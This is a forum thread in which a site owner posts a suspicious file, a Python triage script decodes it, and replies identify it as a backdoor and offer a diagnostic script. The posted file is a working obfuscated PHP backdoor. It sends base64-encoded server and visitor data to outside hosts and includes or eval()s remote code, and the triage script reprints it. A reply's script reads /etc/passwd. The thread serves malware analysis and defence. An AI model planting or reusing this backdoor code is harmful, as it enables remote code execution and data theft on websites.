HELP I've been hacked!

Posted: Tue Apr 29, 2008 6:40 pm
by wwmmww
I found this strange file. Does this look suspicious to anyone?? (it does to me!). Thanks to anyone who can advise.

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>
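
The following triage script is an added example and not part of the original post. It takes the file quoted above as its input (the posted code, reformatted onto several lines), decodes every base64_decode("...") literal, folds the "a"."b" concatenations back together so the URLs the script contacts become readable, and lists which request fields get base64-encoded into the query string it sends. The function names and the reported categories are this example's own; the regexes assume the simple double-quoted, unescaped string style the sample uses.

```python
"""Static triage of an obfuscated PHP dropper: decode its base64 literals,
rebuild the remote URLs it assembles, and flag the dangerous constructs."""
import base64
import re

# The file from the forum post, reformatted onto several lines (constructed
# sample input; PHP ignores the added line breaks between statements).
SAMPLE = r'''<? error_reporting(0);$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str)));
else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str));
else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>'''

# base64_decode("...") with a literal argument (hypothetical helper regexes).
B64_CALL = re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)')
# One double-quoted literal followed by any number of ."..." concatenations.
# The leading literal is optional-free (matched always) so every string is
# consumed in order and quote pairing is preserved while scanning.
STRING_CHAIN = re.compile(r'"[^"]*"(?:\s*\.\s*"[^"]*")*')


def decode_literals(src):
    """Return [(encoded, decoded), ...] for every base64_decode("...") call, in order."""
    out = []
    for enc in B64_CALL.findall(src):
        try:
            dec = base64.b64decode(enc, validate=True).decode("utf-8", "replace")
        except ValueError as exc:          # binascii.Error is a ValueError
            dec = "<undecodable: %s>" % exc
        out.append((enc, dec))
    return out


def deobfuscate(src):
    """Replace base64_decode("...") with its plaintext literal, then fold
    adjacent "a"."b" concatenations into one literal."""
    def _decode(m):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            return m.group(0)              # leave undecodable calls untouched
        return '"%s"' % text.replace('"', "'")   # keep it a single literal

    def _fold(m):
        return '"%s"' % "".join(re.findall(r'"([^"]*)"', m.group(0)))

    return STRING_CHAIN.sub(_fold, B64_CALL.sub(_decode, src))


def remote_targets(src):
    """Every http(s) URL the script builds, after deobfuscation."""
    return re.findall(r'"(https?://[^"]+)"', deobfuscate(src))


def triage(src):
    """Flag the constructs that make this a dropper rather than a normal include."""
    clean = deobfuscate(src)
    return {
        "suppresses_errors": bool(re.search(r'error_reporting\(\s*0\s*\)', clean)),
        # include() of a URL only works with allow_url_include=On; it runs whatever the host serves
        "remote_includes": re.findall(r'(?:include|require)(?:_once)?\(\s*"(https?://[^"]*)"', clean),
        "eval_of_remote_content": bool(re.search(r'eval\(\s*file_get_contents\(\s*"https?://', clean)),
        # request context base64-encoded into the query string (first occurrence order, deduplicated)
        "leaked_server_vars": list(dict.fromkeys(re.findall(r'\$_SERVER\["([A-Z_]+)"\]', clean))),
    }


if __name__ == "__main__":
    for enc, dec in decode_literals(SAMPLE):
        print("%-36s -> %s" % (enc, dec))
    for key, value in triage(SAMPLE).items():
        print("%s: %s" % (key, value))
```

Run against the sample, `remote_targets` yields the three fallback hosts in the order the script tries them, and `triage` shows the two failure modes the author relied on: if the first two remote includes fail, the third branch fetches the content with file_get_contents and eval()s it, so the host chain, not the file on disk, decides what executes on each request. The leaked_server_vars list is what the operator learns about every visitor and about the compromised site itself (SCRIPT_FILENAME gives the absolute path of the infected file).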

Re: HELP I've been hacked!

Posted: Wed Apr 30, 2008 12:16 pm
by Mordred
Yep, a backdoor.
You should be more concerned about how it got there (although at least one of the related hosts appears to be online).

Re: HELP I've been hacked!

Posted: Thu May 01, 2008 7:45 am
by Chris Corbyn
Are you on a shared hosting plan? What host are you with?

Run this script and see if you get a generic username output:

<?php

// UID to look up: the effective UID of the PHP process when the POSIX
// extension is available (the user Apache/PHP actually runs as), otherwise
// getmyuid(), which reports the owner of this script file instead.
$uid = function_exists('posix_geteuid') ? posix_geteuid() : getmyuid();

if (is_file('/etc/passwd') && is_readable('/etc/passwd')) {
  $found = false;
  foreach (file('/etc/passwd') as $line) {
    // name:password:UID:GID:gecos:home:shell -- compare the UID field only,
    // so a matching GID on some other line is not mistaken for a hit
    $data = explode(':', trim($line));
    if (count($data) >= 3 && (int) $data[2] === (int) $uid) {
      printf("Server is using user '%s' (uid %d)\n", $data[0], $uid);
      $found = true;
      break;
    }
  }
  if (!$found) {
    printf("No /etc/passwd entry for uid %d\n", $uid);
  }
} else {
  printf("Unable to determine username\n");
}
That script isn't dangerous. It tries to look up the username of the UID Apache is running under. If the server is a Windows server, or a *nix variant that doesn't use /etc/passwd, then it won't work.

If the user is anything like "apache", "http", "nobody", "www" etc., then it's highly probable all the other users on that server have free and easy access to your files.